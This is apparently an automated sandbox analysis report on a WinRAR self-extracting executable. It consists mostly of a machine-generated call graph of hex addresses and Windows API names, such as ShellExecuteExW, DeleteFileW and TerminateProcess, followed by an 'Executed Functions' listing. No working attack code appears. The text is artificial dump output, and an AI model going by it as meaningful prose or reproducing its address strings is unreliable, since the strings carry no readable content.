__vswprintf_c_l 23515->23536 23537 d863f2 119 API calls __vswprintf_c_l 23515->23537 23518->23437 23519->23437 23522 d821f0 ___std_exception_copy __EH_prolog ___scrt_get_show_window_mode 23520->23522 23521 d822db 23521->23515 23522->23521 23523 d76e0b 68 API calls 23522->23523 23523->23522 23525 d7fa73 23524->23525 23526 d7fa78 23524->23526 23527 d7fbb1 77 API calls 23525->23527 23528 d7fa91 23526->23528 23529 d7fdc9 72 API calls 23526->23529 23527->23526 23528->23515 23529->23528 23530->23515 23531->23515 23533 d7fde3 ResetEvent ReleaseSemaphore 23532->23533 23534 d7fe0e 23532->23534 23535 d7fac7 70 API calls 23533->23535 23534->23515 23535->23534 23536->23515 23537->23515 23538->23510 23539->23175 23540->23175 23541->23172 23543 d75da6 23542->23543 23588 d75cc5 23543->23588 23545 d75e11 23545->23187 23547 d75dd9 23547->23545 23548 d75e1a 23547->23548 23593 d7a950 CharUpperW CompareStringW CompareStringW 23547->23593 23548->23545 23594 d7f0e1 CompareStringW 23548->23594 23551 d78116 23550->23551 23552 d781b7 CharUpperW 23551->23552 23553 d781ca 23552->23553 23553->23190 23555 d77c20 23554->23555 23556 d77c60 23555->23556 23600 d76f49 67 API calls 23555->23600 23556->23197 23558 d77c58 23601 d76d0d 67 API calls 23558->23601 23561 d79897 2 API calls 23560->23561 23562 d7987d 23561->23562 23563 d79888 23562->23563 23602 d79b6a SetEndOfFile 23562->23602 23563->23225 23566 d79a23 23565->23566 23569 d79a32 23565->23569 23567 d79a29 FlushFileBuffers 23566->23567 23566->23569 23567->23569 23568 d79aab SetFileTime 23568->23254 23569->23568 23570->23179 23571->23182 23572->23209 23573->23197 23574->23197 23575->23195 23576->23212 23577->23202 23578->23212 23579->23222 23580->23224 23581->23250 23582->23250 23583->23250 23584->23250 23585->23248 23586->23249 23587->23204 23595 d75bc2 23588->23595 23590 d75ce6 23590->23547 23592 d75bc2 3 API calls 23592->23590 23593->23547 23594->23545 23596 d75bcc 23595->23596 23598 d75cb4 23596->23598 23599 d7a950 CharUpperW CompareStringW CompareStringW 23596->23599 23598->23590 23598->23592 23599->23596 23600->23558 23601->23556 23602->23563 23605 d7a27d 23604->23605 23606 d7a30d FindNextFileW 23605->23606 23607 d7a29b FindFirstFileW 23605->23607 23608 d7a32c 23606->23608 23609 d7a318 GetLastError 23606->23609 23610 d7a2b4 23607->23610 23615 d7a2f1 23607->23615 23608->23615 23609->23608 23611 d7b275 2 API calls 23610->23611 23612 d7a2cd 23611->23612 23613 d7a2e6 GetLastError 23612->23613 23614 d7a2d1 FindFirstFileW 23612->23614 23613->23615 23614->23613 23614->23615 23615->23128 23616->22966 23617->22970 23618->22970 23619->22973 23620->22981 23622 d79ba2 67 API calls 23621->23622 23623 d71ee9 23622->23623 23624 d71eed 23623->23624 23625 d719b1 89 API calls 23623->23625 23624->22989 23624->22990 23626 d71efa 23625->23626 23626->23624 23628 d76d0d 67 API calls 23626->23628 23628->23624 23873 d91b40 5 API calls 2 library calls 23839 d89646 92 API calls 23874 d8d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23875 d9d774 IsProcessorFeaturePresent 23654 d8b077 23656 d8b07c 23654->23656 23664 d8aa99 _wcsrchr 23654->23664 23655 d896ec ExpandEnvironmentStringsW 23655->23664 23656->23664 23680 d8b9aa 23656->23680 23658 d8b642 23660 d8ad86 SetWindowTextW 23660->23664 23663 d920de 22 API calls 23663->23664 23664->23655 23664->23658 23664->23660 23664->23663 23672 d8af50 GetDlgItem SetWindowTextW SendMessageW 23664->23672 23674 d8af92 SendMessageW 23664->23674 23678 d8ab6a ___scrt_get_show_window_mode 23664->23678 23679 d80b12 CompareStringW 23664->23679 23703 d88b8e GetCurrentDirectoryW 23664->23703 23704 d7a1a9 7 API calls 23664->23704 23707 d7a132 FindClose 23664->23707 23708 d89844 69 API calls ___std_exception_copy 23664->23708 23666 d8ab77 SetFileAttributesW 23668 d8ac32 GetFileAttributesW 23666->23668 23666->23678 23670 d8ac40 DeleteFileW 23668->23670 23668->23678 23670->23678 23672->23664 23673 d73f5b _swprintf 51 API calls 23675 d8ac75 GetFileAttributesW 23673->23675 23674->23664 23676 d8ac86 MoveFileW 23675->23676 23675->23678 23677 d8ac9e MoveFileExW 23676->23677 23676->23678 23677->23678 23678->23664 23678->23666 23678->23668 23678->23673 23705 d7b100 52 API calls 2 library calls 23678->23705 23706 d7a1a9 7 API calls 23678->23706 23679->23664 23682 d8b9b4 ___scrt_get_show_window_mode 23680->23682 23681 d8bc0c 23681->23664 23682->23681 23683 d8ba9f 23682->23683 23709 d80b12 CompareStringW 23682->23709 23685 d79dff 4 API calls 23683->23685 23686 d8bab4 23685->23686 23687 d8bad3 ShellExecuteExW 23686->23687 23710 d7ae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23686->23710 23687->23681 23692 d8bae6 23687->23692 23689 d8bacb 23689->23687 23690 d8bb21 23711 d8be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23690->23711 23691 d8bb77 CloseHandle 23693 d8bb85 23691->23693 23695 d8bb90 23691->23695 23692->23690 23692->23691 23694 d8bb1b ShowWindow 23692->23694 23712 d80b12 CompareStringW 23693->23712 23694->23690 23695->23681 23699 d8bc07 ShowWindow 23695->23699 23698 d8bb39 23698->23691 23700 d8bb4c GetExitCodeProcess 23698->23700 23699->23681 23700->23691 23701 d8bb5f 23700->23701 23701->23691 23703->23664 23704->23664 23705->23678 23706->23678 23707->23664 23708->23664 23709->23683 23710->23689 23711->23698 23712->23695 23779 d71067 75 API calls pre_c_initialization 23876 d91f60 RtlUnwind 23809 d88963 GdipDisposeImage GdipFree __except_handler4 22075 d8d611 22076 d8d61d ___scrt_is_nonwritable_in_current_image 22075->22076 22101 d8d126 22076->22101 22078 d8d624 22080 d8d64d 22078->22080 22178 d8da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 22078->22178 22089 d8d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22080->22089 22112 d9572c 22080->22112 22084 d8d66c ___scrt_is_nonwritable_in_current_image 22085 d8d6ec 22120 d8db90 22085->22120 22089->22085 22179 d94760 38 API calls 5 library calls 22089->22179 22096 d8d718 22098 d8d721 22096->22098 22180 d94b67 28 API calls _abort 22096->22180 22181 d8d29d 13 API calls 2 library calls 22098->22181 22102 d8d12f 22101->22102 22182 d8d8cb IsProcessorFeaturePresent 22102->22182 22104 d8d13b 22183 d90b66 22104->22183 22106 d8d140 22111 d8d144 22106->22111 22192 d955b9 22106->22192 22109 d8d15b 22109->22078 22111->22078 22115 d95743 22112->22115 22113 d8d783 ___delayLoadHelper2@8 5 API calls 22114 d8d666 22113->22114 22114->22084 22116 d956d0 22114->22116 22115->22113 22119 d956ff 22116->22119 22117 d8d783 ___delayLoadHelper2@8 5 API calls 22118 d95728 22117->22118 22118->22089 22119->22117 22242 d8dea0 22120->22242 22123 d8d6f2 22124 d9567d 22123->22124 22244 d98558 22124->22244 22126 d95686 22128 d8d6fb 22126->22128 22248 d988e3 38 API calls 22126->22248 22129 d8c131 22128->22129 22392 d7f353 22129->22392 22133 d8c150 22441 d89036 22133->22441 22135 d8c159 22445 d80722 GetCPInfo 22135->22445 22137 d8c163 ___scrt_get_show_window_mode 22138 d8c176 GetCommandLineW 22137->22138 22139 d8c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22138->22139 22140 d8c185 22138->22140 22141 d73f5b _swprintf 51 API calls 22139->22141 22448 d8a8d4 22140->22448 22143 d8c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 22141->22143 22461 d89a76 LoadBitmapW 22143->22461 22146 d8c1fd 22455 d8be0a 22146->22455 22147 d8c193 OpenFileMappingW 22150 d8c1ac MapViewOfFile 22147->22150 22151 d8c1f3 CloseHandle 22147->22151 22153 d8c1ea UnmapViewOfFile 22150->22153 22154 d8c1bd __vswprintf_c_l 22150->22154 22151->22139 22153->22151 22155 d8be0a 2 API calls 22154->22155 22157 d8c1d9 22155->22157 22156 d8c2b3 22158 d8c2c5 DialogBoxParamW 22156->22158 22157->22153 22159 d8c2ff 22158->22159 22160 d8c318 22159->22160 22161 d8c311 Sleep 22159->22161 22162 d8c326 22160->22162 22486 d89237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 22160->22486 22161->22160 22164 d8c345 DeleteObject 22162->22164 22165 d8c35c DeleteObject 22164->22165 22166 d8c35f 22164->22166 22165->22166 22167 d8c390 22166->22167 22168 d8c3a2 22166->22168 22487 d8be69 WaitForSingleObject PeekMessageW WaitForSingleObject 22167->22487 22484 d8909e 22168->22484 22170 d8c396 CloseHandle 22170->22168 22172 d8c3dc 22173 d94a9b GetModuleHandleW 22172->22173 22174 d8d70e 22173->22174 22174->22096 22175 d94bc4 22174->22175 22656 d94941 22175->22656 22178->22078 22179->22085 22180->22098 22181->22084 22182->22104 22184 d90b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22183->22184 22196 d91c0e 22184->22196 22188 d90b8c 22188->22106 22189 d90b81 22189->22188 22210 d91c4a DeleteCriticalSection 22189->22210 22191 d90b79 22191->22106 22238 d98ac5 22192->22238 22195 d90b8f 8 API calls 3 library calls 22195->22111 22198 d91c17 22196->22198 22199 d91c40 22198->22199 22200 d90b75 22198->22200 22211 d91e85 22198->22211 22216 d91c4a DeleteCriticalSection 22199->22216 22200->22191 22202 d90ca6 22200->22202 22231 d91d9a 22202->22231 22204 d90cb0 22205 d90cbb 22204->22205 22236 d91e48 6 API calls try_get_function 22204->22236 22205->22189 22207 d90cc9 22208 d90cd6 22207->22208 22237 d90cd9 6 API calls ___vcrt_FlsFree 22207->22237 22208->22189 22210->22191 22217 d91c79 22211->22217 22214 d91ea8 22214->22198 22215 d91ebc InitializeCriticalSectionAndSpinCount 22215->22214 22216->22200 22218 d91ca9 22217->22218 22219 d91cad 22217->22219 22218->22219 22222 d91ccd 22218->22222 22224 d91d19 22218->22224 22219->22214 22219->22215 22221 d91cd9 GetProcAddress 22223 d91ce9 __crt_fast_encode_pointer 22221->22223 22222->22219 22222->22221 22223->22219 22225 d91d41 LoadLibraryExW 22224->22225 22226 d91d36 22224->22226 22227 d91d5d GetLastError 22225->22227 22228 d91d75 22225->22228 22226->22218 22227->22228 22230 d91d68 LoadLibraryExW 22227->22230 22228->22226 22229 d91d8c FreeLibrary 22228->22229 22229->22226 22230->22228 22232 d91c79 try_get_function 5 API calls 22231->22232 22233 d91db4 22232->22233 22234 d91dcc TlsAlloc 22233->22234 22235 d91dbd 22233->22235 22235->22204 22236->22207 22237->22205 22239 d98ade 22238->22239 22240 d8d783 ___delayLoadHelper2@8 5 API calls 22239->22240 22241 d8d14d 22240->22241 22241->22109 22241->22195 22243 d8dba3 GetStartupInfoW 22242->22243 22243->22123 22245 d98561 22244->22245 22246 d9856a 22244->22246 22249 d98457 22245->22249 22246->22126 22248->22126 22250 d9631f pre_c_initialization 38 API calls 22249->22250 22251 d98464 22250->22251 22269 d98576 22251->22269 22253 d9846c 22278 d981eb 22253->22278 22256 d98483 22256->22246 22259 d984c6 22262 d959c2 _free 20 API calls 22259->22262 22262->22256 22263 d984c1 22302 d95e3e 20 API calls __dosmaperr 22263->22302 22265 d9850a 22265->22259 22303 d980c1 26 API calls 22265->22303 22266 d984de 22266->22265 22267 d959c2 _free 20 API calls 22266->22267 22267->22265 22270 d98582 ___scrt_is_nonwritable_in_current_image 22269->22270 22271 d9631f pre_c_initialization 38 API calls 22270->22271 22276 d9858c 22271->22276 22273 d98610 ___scrt_is_nonwritable_in_current_image 22273->22253 22276->22273 22277 d959c2 _free 20 API calls 22276->22277 22304 d95a4a 38 API calls _abort 22276->22304 22305 d976d6 EnterCriticalSection 22276->22305 22306 d98607 LeaveCriticalSection _abort 22276->22306 22277->22276 22279 d92636 __fassign 38 API calls 22278->22279 22280 d981fd 22279->22280 22281 d9820c GetOEMCP 22280->22281 22282 d9821e 22280->22282 22283 d98235 22281->22283 22282->22283 22284 d98223 GetACP 22282->22284 22283->22256 22285 d959fc 22283->22285 22284->22283 22286 d95a3a 22285->22286 22287 d95a0a FindHandlerForForeignException 22285->22287 22308 d95e3e 20 API calls __dosmaperr 22286->22308 22287->22286 22289 d95a25 RtlAllocateHeap 22287->22289 22307 d946ca 7 API calls 2 library calls 22287->22307 22289->22287 22290 d95a38 22289->22290 22290->22259 22292 d98618 22290->22292 22293 d981eb 40 API calls 22292->22293 22294 d98637 22293->22294 22297 d98688 IsValidCodePage 22294->22297 22299 d9863e 22294->22299 22301 d986ad ___scrt_get_show_window_mode 22294->22301 22295 d8d783 ___delayLoadHelper2@8 5 API calls 22296 d984b9 22295->22296 22296->22263 22296->22266 22298 d9869a GetCPInfo 22297->22298 22297->22299 22298->22299 22298->22301 22299->22295 22309 d982c3 GetCPInfo 22301->22309 22302->22259 22303->22259 22305->22276 22306->22276 22307->22287 22308->22290 22310 d983a7 22309->22310 22311 d982fd 22309->22311 22313 d8d783 ___delayLoadHelper2@8 5 API calls 22310->22313 22319 d993f3 22311->22319 22315 d98453 22313->22315 22315->22299 22318 d975cb __vswprintf_c_l 43 API calls 22318->22310 22320 d92636 __fassign 38 API calls 22319->22320 22321 d99413 MultiByteToWideChar 22320->22321 22323 d99451 22321->22323 22330 d994e9 22321->22330 22326 d959fc __vswprintf_c_l 21 API calls 22323->22326 22331 d99472 __vswprintf_c_l ___scrt_get_show_window_mode 22323->22331 22324 d8d783 ___delayLoadHelper2@8 5 API calls 22327 d9835e 22324->22327 22325 d994e3 22338 d97616 20 API calls _free 22325->22338 22326->22331 22333 d975cb 22327->22333 22329 d994b7 MultiByteToWideChar 22329->22325 22332 d994d3 GetStringTypeW 22329->22332 22330->22324 22331->22325 22331->22329 22332->22325 22334 d92636 __fassign 38 API calls 22333->22334 22335 d975de 22334->22335 22339 d973ae 22335->22339 22338->22330 22341 d973c9 __vswprintf_c_l 22339->22341 22340 d973ef MultiByteToWideChar 22342 d97419 22340->22342 22343 d975a3 22340->22343 22341->22340 22346 d959fc __vswprintf_c_l 21 API calls 22342->22346 22349 d9743a __vswprintf_c_l 22342->22349 22344 d8d783 ___delayLoadHelper2@8 5 API calls 22343->22344 22345 d975b6 22344->22345 22345->22318 22346->22349 22347 d974ef 22375 d97616 20 API calls _free 22347->22375 22348 d97483 MultiByteToWideChar 22348->22347 22350 d9749c 22348->22350 22349->22347 22349->22348 22366 d97a09 22350->22366 22354 d974fe 22356 d959fc __vswprintf_c_l 21 API calls 22354->22356 22359 d9751f __vswprintf_c_l 22354->22359 22355 d974c6 22355->22347 22357 d97a09 __vswprintf_c_l 11 API calls 22355->22357 22356->22359 22357->22347 22358 d97594 22374 d97616 20 API calls _free 22358->22374 22359->22358 22360 d97a09 __vswprintf_c_l 11 API calls 22359->22360 22362 d97573 22360->22362 22362->22358 22363 d97582 WideCharToMultiByte 22362->22363 22363->22358 22364 d975c2 22363->22364 22376 d97616 20 API calls _free 22364->22376 22377 d97735 22366->22377 22370 d97a79 LCMapStringW 22371 d97a39 22370->22371 22372 d8d783 ___delayLoadHelper2@8 5 API calls 22371->22372 22373 d974b3 22372->22373 22373->22347 22373->22354 22373->22355 22374->22347 22375->22343 22376->22347 22378 d97765 22377->22378 22379 d97761 22377->22379 22378->22371 22384 d97a91 10 API calls 3 library calls 22378->22384 22379->22378 22382 d97785 22379->22382 22385 d977d1 22379->22385 22381 d97791 GetProcAddress 22383 d977a1 __crt_fast_encode_pointer 22381->22383 22382->22378 22382->22381 22383->22378 22384->22370 22386 d977f2 LoadLibraryExW 22385->22386 22390 d977e7 22385->22390 22387 d9780f GetLastError 22386->22387 22388 d97827 22386->22388 22387->22388 22391 d9781a LoadLibraryExW 22387->22391 22389 d9783e FreeLibrary 22388->22389 22388->22390 22389->22390 22390->22379 22391->22388 22488 d8cec0 22392->22488 22395 d7f377 GetProcAddress 22398 d7f3a0 GetProcAddress 22395->22398 22399 d7f390 22395->22399 22396 d7f3c8 22397 d7f6fd GetModuleFileNameW 22396->22397 22499 d9462a 42 API calls __vswprintf_c_l 22396->22499 22410 d7f718 22397->22410 22398->22396 22400 d7f3ac 22398->22400 22399->22398 22400->22396 22402 d7f63b 22402->22397 22403 d7f646 GetModuleFileNameW CreateFileW 22402->22403 22404 d7f675 SetFilePointer 22403->22404 22405 d7f6f1 CloseHandle 22403->22405 22404->22405 22406 d7f685 ReadFile 22404->22406 22405->22397 22406->22405 22408 d7f6a4 22406->22408 22408->22405 22412 d7f309 2 API calls 22408->22412 22411 d7f74d CompareStringW 22410->22411 22413 d7f783 GetFileAttributesW 22410->22413 22414 d7f797 22410->22414 22490 d7a8e0 22410->22490 22493 d7f309 22410->22493 22411->22410 22412->22408 22413->22410 22413->22414 22415 d7f7a4 22414->22415 22417 d7f7d6 22414->22417 22418 d7f7bc GetFileAttributesW 22415->22418 22420 d7f7d0 22415->22420 22416 d7f8e5 22440 d88b8e GetCurrentDirectoryW 22416->22440 22417->22416 22419 d7a8e0 GetVersionExW 22417->22419 22418->22415 22418->22420 22421 d7f7f0 22419->22421 22420->22417 22422 d7f7f7 22421->22422 22423 d7f85d 22421->22423 22425 d7f309 2 API calls 22422->22425 22424 d73f5b _swprintf 51 API calls 22423->22424 22426 d7f885 AllocConsole 22424->22426 22427 d7f801 22425->22427 22428 d7f892 GetCurrentProcessId AttachConsole 22426->22428 22429 d7f8dd ExitProcess 22426->22429 22430 d7f309 2 API calls 22427->22430 22500 d920b3 22428->22500 22432 d7f80b 22430->22432 22434 d7d142 54 API calls 22432->22434 22433 d7f8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 22433->22429 22435 d7f826 22434->22435 22436 d73f5b _swprintf 51 API calls 22435->22436 22437 d7f839 22436->22437 22438 d7d142 54 API calls 22437->22438 22439 d7f848 22438->22439 22439->22429 22440->22133 22442 d7f309 2 API calls 22441->22442 22443 d8904a OleInitialize 22442->22443 22444 d8906d GdiplusStartup SHGetMalloc 22443->22444 22444->22135 22446 d80746 IsDBCSLeadByte 22445->22446 22446->22446 22447 d8075e 22446->22447 22447->22137 22449 d8a8de 22448->22449 22450 d8a9f4 22449->22450 22451 d8a926 CharUpperW 22449->22451 22452 d8a9a9 CharUpperW 22449->22452 22453 d8a94d CharUpperW 22449->22453 22502 d7dfde 73 API calls ___scrt_get_show_window_mode 22449->22502 22450->22146 22450->22147 22451->22449 22452->22449 22453->22449 22456 d8cec0 22455->22456 22457 d8be17 SetEnvironmentVariableW 22456->22457 22459 d8be3a 22457->22459 22458 d8be62 22458->22139 22459->22458 22460 d8be56 SetEnvironmentVariableW 22459->22460 22460->22458 22462 d89aa0 GetObjectW 22461->22462 22463 d89a97 22461->22463 22503 d88ac0 22462->22503 22508 d88bd0 FindResourceW 22463->22508 22467 d89af3 22479 d7caa7 22467->22479 22469 d89ad3 22524 d88b22 GetDC GetDeviceCaps ReleaseDC 22469->22524 22470 d88bd0 13 API calls 22472 d89ac8 22470->22472 22472->22469 22474 d89ace DeleteObject 22472->22474 22473 d89adb 22525 d88adf GetDC GetDeviceCaps ReleaseDC 22473->22525 22474->22469 22476 d89ae4 22526 d88cf3 8 API calls ___scrt_get_show_window_mode 22476->22526 22478 d89aeb DeleteObject 22478->22467 22537 d7cacc 22479->22537 22483 d7caba 22483->22156 22485 d890c4 GdiplusShutdown CoUninitialize 22484->22485 22485->22172 22486->22162 22487->22170 22489 d7f35d GetModuleHandleW 22488->22489 22489->22395 22489->22396 22491 d7a8f4 GetVersionExW 22490->22491 22492 d7a930 22490->22492 22491->22492 22492->22410 22494 d8cec0 22493->22494 22495 d7f316 GetSystemDirectoryW 22494->22495 22496 d7f32e 22495->22496 22497 d7f34c 22495->22497 22498 d7f33f LoadLibraryW 22496->22498 22497->22410 22498->22497 22499->22402 22501 d920bb 22500->22501 22501->22433 22501->22501 22502->22449 22527 d88adf GetDC GetDeviceCaps ReleaseDC 22503->22527 22505 d88ac7 22506 d88ad3 22505->22506 22528 d88b22 GetDC GetDeviceCaps ReleaseDC 22505->22528 22506->22467 22506->22469 22506->22470 22509 d88bf1 SizeofResource 22508->22509 22510 d88c23 22508->22510 22509->22510 22511 d88c05 LoadResource 22509->22511 22510->22462 22511->22510 22512 d88c16 LockResource 22511->22512 22512->22510 22513 d88c2a GlobalAlloc 22512->22513 22513->22510 22514 d88c41 GlobalLock 22513->22514 22515 d88cb8 GlobalFree 22514->22515 22516 d88c4c __vswprintf_c_l 22514->22516 22515->22510 22517 d88c54 CreateStreamOnHGlobal 22516->22517 22518 d88c6c 22517->22518 22519 d88cb1 GlobalUnlock 22517->22519 22529 d88b65 GdipAlloc 22518->22529 22519->22515 22522 d88ca6 22522->22519 22523 d88c90 GdipCreateHBITMAPFromBitmap 22523->22522 22524->22473 22525->22476 22526->22478 22527->22505 22528->22506 22530 d88b77 22529->22530 22532 d88b84 22529->22532 22533 d88924 22530->22533 22532->22519 22532->22522 22532->22523 22534 d8894c GdipCreateBitmapFromStream 22533->22534 22535 d88945 GdipCreateBitmapFromStreamICM 22533->22535 22536 d88951 22534->22536 22535->22536 22536->22532 22538 d7cad6 _wcschr __EH_prolog 22537->22538 22539 d7cb02 GetModuleFileNameW 22538->22539 22540 d7cb33 22538->22540 22541 d7cb1c 22539->22541 22560 d7973d 22540->22560 22541->22540 22545 d7cc9f 22546 d799e0 70 API calls 22545->22546 22555 d7cce9 22545->22555 22549 d7ccb9 ___std_exception_copy 22546->22549 22550 d7990d 73 API calls 22549->22550 22549->22555 22553 d7ccdf ___std_exception_copy 22550->22553 22552 d7cb63 22552->22545 22552->22555 22569 d79aeb 22552->22569 22584 d7990d 22552->22584 22592 d799e0 22552->22592 22553->22555 22597 d806e9 MultiByteToWideChar 22553->22597 22577 d79437 22555->22577 22556 d7ce48 GetModuleHandleW FindResourceW 22557 d7ce76 22556->22557 22558 d7ce70 22556->22558 22559 d7c91f 52 API calls 22557->22559 22558->22483 22559->22558 22561 d79747 22560->22561 22562 d7979d CreateFileW 22561->22562 22563 d7981b 22562->22563 22564 d797ca GetLastError 22562->22564 22563->22552 22598 d7b275 22564->22598 22566 d797ea 22566->22563 22567 d797ee CreateFileW GetLastError 22566->22567 22568 d79812 22567->22568 22568->22563 22570 d79b0f SetFilePointer 22569->22570 22571 d79afe 22569->22571 22572 d79b2d GetLastError 22570->22572 22574 d79b48 22570->22574 22571->22574 22611 d76eae 68 API calls 22571->22611 22572->22574 22575 d79b37 22572->22575 22574->22552 22575->22574 22612 d76eae 68 API calls 22575->22612 22578 d7945b 22577->22578 22583 d7946c 22577->22583 22579 d79467 22578->22579 22580 d7946e 22578->22580 22578->22583 22613 d795ea 22579->22613 22618 d794a3 22580->22618 22583->22556 22585 d79924 22584->22585 22587 d79985 22585->22587 22588 d79977 22585->22588 22590 d79987 22585->22590 22633 d79613 22585->22633 22587->22552 22645 d76e74 68 API calls 22588->22645 22590->22587 22591 d79613 5 API calls 22590->22591 22591->22590 22650 d79897 22592->22650 22595 d79a0b 22595->22552 22597->22555 22599 d7b282 22598->22599 22607 d7b28c 22599->22607 22608 d7b40f CharUpperW 22599->22608 22601 d7b29b 22609 d7b43b CharUpperW 22601->22609 22603 d7b2aa 22604 d7b325 GetCurrentDirectoryW 22603->22604 22605 d7b2ae 22603->22605 22604->22607 22610 d7b40f CharUpperW 22605->22610 22607->22566 22608->22601 22609->22603 22610->22607 22611->22570 22612->22574 22614 d795f3 22613->22614 22615 d795f7 22613->22615 22614->22583 22615->22614 22624 d79dac 22615->22624 22619 d794cd 22618->22619 22620 d794af 22618->22620 22621 d794ec 22619->22621 22632 d76d80 67 API calls 22619->22632 22620->22619 22622 d794bb CloseHandle 22620->22622 22621->22583 22622->22619 22625 d8cec0 22624->22625 22626 d79db9 DeleteFileW 22625->22626 22627 d79611 22626->22627 22628 d79dcc 22626->22628 22627->22583 22629 d7b275 2 API calls 22628->22629 22630 d79de0 22629->22630 22630->22627 22631 d79de4 DeleteFileW 22630->22631 22631->22627 22632->22621 22634 d79621 GetStdHandle 22633->22634 22635 d7962c ReadFile 22633->22635 22634->22635 22636 d79645 22635->22636 22637 d79665 22635->22637 22646 d7971a 22636->22646 22637->22585 22639 d7964c 22640 d7965a 22639->22640 22641 d7966d GetLastError 22639->22641 22642 d7967c 22639->22642 22644 d79613 GetFileType 22640->22644 22641->22637 22641->22642 22642->22637 22643 d7968c GetLastError 22642->22643 22643->22637 22643->22640 22644->22637 22645->22587 22647 d79723 GetFileType 22646->22647 22648 d79720 22646->22648 22649 d79731 22647->22649 22648->22639 22649->22639 22653 d79902 22650->22653 22654 d798a3 22650->22654 22651 d798da SetFilePointer 22652 d798f8 GetLastError 22651->22652 22651->22653 22652->22653 22653->22595 22655 d76eae 68 API calls 22653->22655 22654->22651 22655->22595 22657 d9494d FindHandlerForForeignException 22656->22657 22658 d94965 22657->22658 22660 d94a9b _abort GetModuleHandleW 22657->22660 22678 d976d6 EnterCriticalSection 22658->22678 22661 d94959 22660->22661 22661->22658 22690 d94adf GetModuleHandleExW 22661->22690 22662 d94a0b 22679 d94a4b 22662->22679 22665 d9496d 22665->22662 22667 d949e2 22665->22667 22698 d95447 20 API calls _abort 22665->22698 22670 d949fa 22667->22670 22671 d956d0 _abort 5 API calls 22667->22671 22668 d94a28 22682 d94a5a 22668->22682 22669 d94a54 22699 d9f149 5 API calls ___delayLoadHelper2@8 22669->22699 22672 d956d0 _abort 5 API calls 22670->22672 22671->22670 22672->22662 22678->22665 22700 d9771e LeaveCriticalSection 22679->22700 22681 d94a24 22681->22668 22681->22669 22701 d97b13 22682->22701 22685 d94a88 22688 d94adf _abort 8 API calls 22685->22688 22686 d94a68 GetPEB 22686->22685 22687 d94a78 GetCurrentProcess TerminateProcess 22686->22687 22687->22685 22689 d94a90 ExitProcess 22688->22689 22691 d94b09 GetProcAddress 22690->22691 22692 d94b2c 22690->22692 22695 d94b1e 22691->22695 22693 d94b3b 22692->22693 22694 d94b32 FreeLibrary 22692->22694 22696 d8d783 ___delayLoadHelper2@8 5 API calls 22693->22696 22694->22693 22695->22692 22697 d94b45 22696->22697 22697->22658 22698->22667 22700->22681 22702 d97b38 22701->22702 22706 d97b2e 22701->22706 22703 d97735 __dosmaperr 5 API calls 22702->22703 22703->22706 22704 d8d783 ___delayLoadHelper2@8 5 API calls 22705 d94a64 22704->22705 22705->22685 22705->22686 22706->22704 23783 d71019 29 API calls pre_c_initialization 23844 d97216 21 API calls 23845 d9ee16 CloseHandle 23812 d93501 QueryPerformanceFrequency QueryPerformanceCounter 23877 d9c301 21 API calls __vswprintf_c_l 23848 d90a00 6 API calls 3 library calls 23786 d8d002 38 API calls 2 library calls 23878 d96f03 21 API calls 2 library calls 23813 d80d3a 26 API calls std::bad_exception::bad_exception 23789 d9f830 DeleteCriticalSection 23879 d8d736 20 API calls 23815 d8a537 93 API calls _swprintf 23816 d95536 8 API calls ___vcrt_uninitialize 23713 d96428 23721 d9784c 23713->23721 23717 d96444 23718 d96451 23717->23718 23729 d96454 11 API calls 23717->23729 23720 d9643c 23722 d97735 __dosmaperr 5 API calls 23721->23722 23723 d97873 23722->23723 23724 d9788b TlsAlloc 23723->23724 23725 d9787c 23723->23725 23724->23725 23726 d8d783 ___delayLoadHelper2@8 5 API calls 23725->23726 23727 d96432 23726->23727 23727->23720 23728 d963a3 20 API calls 3 library calls 23727->23728 23728->23717 23729->23720 23794 d8b820 72 API calls 23817 d89123 73 API calls 23744 d8c726 19 API calls ___delayLoadHelper2@8

                                                                                      Executed Functions

                                                                                      Function 00D8C131 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199filesleeptimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00D7F353: GetModuleHandleW.KERNEL32 ref: 00D7F36B
                                                                                        • Part of subcall function 00D7F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D7F383
                                                                                        • Part of subcall function 00D7F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D7F3A6
                                                                                        • Part of subcall function 00D88B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D88B96
                                                                                        • Part of subcall function 00D89036: OleInitialize.OLE32(00000000), ref: 00D8904F
                                                                                        • Part of subcall function 00D89036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D89086
                                                                                        • Part of subcall function 00D89036: SHGetMalloc.SHELL32(00DB20E8), ref: 00D89090
                                                                                        • Part of subcall function 00D80722: GetCPInfo.KERNEL32(00000000,?), ref: 00D80733
                                                                                        • Part of subcall function 00D80722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D80747
                                                                                      • GetCommandLineW.KERNEL32 ref: 00D8C179
                                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D8C1A0
                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D8C1B1
                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00D8C1EB
                                                                                        • Part of subcall function 00D8BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D8BE20
                                                                                        • Part of subcall function 00D8BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D8BE5C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D8C1F4
